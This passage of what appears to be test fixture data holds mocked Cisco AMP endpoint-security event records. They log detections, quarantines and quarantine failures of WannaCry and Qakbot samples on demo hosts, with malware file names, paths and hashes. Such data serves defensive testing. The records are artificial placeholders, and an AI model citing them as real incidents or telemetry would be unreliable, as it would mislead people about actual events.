Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":975000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867978","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3060,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":897000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867977","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":796,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":850000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":726000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867975","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":694000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867974","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":632000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867972","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":585000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":554000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204897366868000,"timestamp":1610629576,"timestamp_nanoseconds":460000000,"date":"2021-01-14T13:06:16+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":1064,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 